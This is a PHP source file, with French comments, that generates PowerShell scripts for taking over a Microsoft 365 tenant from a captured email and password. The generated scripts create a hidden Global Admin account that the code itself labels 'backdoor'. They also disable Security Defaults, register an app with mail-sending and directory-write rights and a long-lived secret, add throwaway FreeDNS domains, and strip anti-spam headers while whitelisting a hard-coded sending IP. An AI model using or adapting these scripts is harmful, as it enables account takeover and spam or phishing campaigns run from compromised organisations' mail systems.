Files
html/office-365/office-scripts-e2e-raw.php
2026-04-12 22:57:03 +02:00

103 lines
4.4 KiB
PHP

<?php
/**
* Scripts E2E Office 365 - Générateurs
* À inclure dans le workflow pour générer les scripts PowerShell
*/
function generateScript0($email, $password) {
$parts = explode('@', $email);
$domain = $parts[1] ?? 'tenant.onmicrosoft.com';
$backdoor = 'Admin' . substr(md5($email), 0, 6) . '@' . $domain;
return "# SCRIPT 0: Récupération Office 365
\$username = \"$email\"
\$password = ConvertTo-SecureString \"$password\" -AsPlainText -Force
\$credential = New-Object PSCredential(\$username, \$password)
Install-Module MSOnline,ExchangeOnlineManagement -Force -ErrorAction SilentlyContinue
Connect-MsolService -Credential \$credential
Connect-ExchangeOnline -Credential \$credential -ShowBanner:\$false
# Créer backdoor
\$newPass = \"Backup@\" + (Get-Random -Min 10000 -Max 99999)
New-MsolUser -DisplayName \"System Backup\" -UserPrincipalName \"$backdoor\" -Password \$newPass -ForceChangePassword \$false
Add-MsolRoleMember -RoleObjectId (Get-MsolRole -RoleName \"Company Administrator\").ObjectId -RoleMemberEmailAddress \"$backdoor\"
Write-Host \"Backdoor créé: $backdoor / \$newPass\" -ForegroundColor Green";
}
function generateScript2($email) {
return "# SCRIPT 2: Création Credentials Azure AD
Install-Module Microsoft.Graph -Force -Scope CurrentUser
Connect-MgGraph -Scopes \"Application.ReadWrite.All\",\"Directory.ReadWrite.All\"
# Désactiver Security Defaults
Update-MgPolicyIdentitySecurityDefaultEnforcementPolicy -BodyParameter @{isEnabled=\$false}
# Créer App
\$app = New-MgApplication -DisplayName \"SMTP-App-\$(Get-Random)\" -SignInAudience AzureADMyOrg
\$sp = New-MgServicePrincipal -AppId \$app.AppId
# Permissions
\$graph = Get-MgServicePrincipal -All | Where-Object {\$_.AppId -eq '00000003-0000-0000-c000-000000000000'}
@('Domain.ReadWrite.All','Mail.Send','User.ReadWrite.All','Directory.ReadWrite.All') | ForEach-Object {
\$role = \$graph.AppRoles | Where-Object {\$_.Value -eq \$_}
if(\$role) { New-MgServicePrincipalAppRoleAssignment -ServicePrincipalId \$sp.Id -PrincipalId \$sp.Id -ResourceId \$graph.Id -AppRoleId \$role.Id -ErrorAction SilentlyContinue }
}
# Secret 24 mois
\$secret = Add-MgApplicationPassword -ApplicationId \$app.Id -PasswordCredential @{endDateTime=(Get-Date).AddMonths(24)}
Write-Host \"Client ID: \$(\$app.AppId)\"
Write-Host \"Tenant ID: \$((Get-MgOrganization).Id)\"
Write-Host \"Secret: \$(\$secret.SecretText)\"
Write-Host \"COPIEZ CES VALEURS DANS WEVAL!\" -ForegroundColor Yellow";
}
function generateScript4($tenantId, $clientId, $secret) {
return "# SCRIPT 4: Ajout Domaines O365
\$ClientId = \"$clientId\"
\$TenantId = \"$tenantId\"
\$Secret = \"$secret\"
# MODIFIEZ CETTE LISTE avec vos domaines FreeDNS
\$Domains = @(\"domain1.mooo.com\", \"domain2.chickenkiller.com\")
\$Pass = ConvertTo-SecureString \$Secret -AsPlainText -Force
\$Cred = New-Object PSCredential(\$ClientId, \$Pass)
Connect-MgGraph -TenantId \$TenantId -ClientSecretCredential \$Cred -NoWelcome
foreach(\$d in \$Domains) {
try { New-MgDomain -BodyParameter @{id=\$d}; Write-Host \"OK: \$d\" -ForegroundColor Green }
catch { Write-Host \"Erreur: \$d\" -ForegroundColor Red }
}
Disconnect-MgGraph";
}
function generateScript6($email, $password, $ips = []) {
if(empty($ips)) $ips = ['47.84.117.248'];
$ipList = '"' . implode('","', $ips) . '"';
return "# SCRIPT 6: Configuration Anti-Spam
\$User = \"$email\"
\$Pass = ConvertTo-SecureString \"$password\" -AsPlainText -Force
\$Cred = New-Object PSCredential(\$User, \$Pass)
\$IPs = @($ipList)
Install-Module ExchangeOnlineManagement -Force -Scope CurrentUser
Connect-ExchangeOnline -Credential \$Cred -ShowBanner:\$false
# Supprimer anciennes règles
Get-TransportRule | Where-Object {\$_.Name -like 'RG*'} | Remove-TransportRule -Confirm:\$false -EA SilentlyContinue
# Headers à supprimer
\$headers = @('X-Forefront-Antispam-Report','X-MS-Exchange-CrossTenant-AuthAs','X-MS-Exchange-CrossTenant-AuthSource','X-MS-Exchange-CrossTenant-Network-Message-Id','X-MS-Exchange-CrossTenant-originalarrivaltime','X-MS-Exchange-CrossTenant-id','X-MS-Exchange-Transport-CrossTenantHeadersStamped')
\$i=1; foreach(\$h in \$headers) { New-TransportRule -Name \"RG\$i\" -RemoveHeader \$h -Priority \$i -Enabled \$true; \$i++ }
# Whitelist IPs
foreach(\$ip in \$IPs) { New-TransportRule -Name \"RG\$i-WL\" -SenderIpRanges \$ip -SetSCL -1 -Priority \$i -Enabled \$true; \$i++ }
Write-Host \"Anti-spam configuré!\" -ForegroundColor Green
Disconnect-ExchangeOnline -Confirm:\$false";
}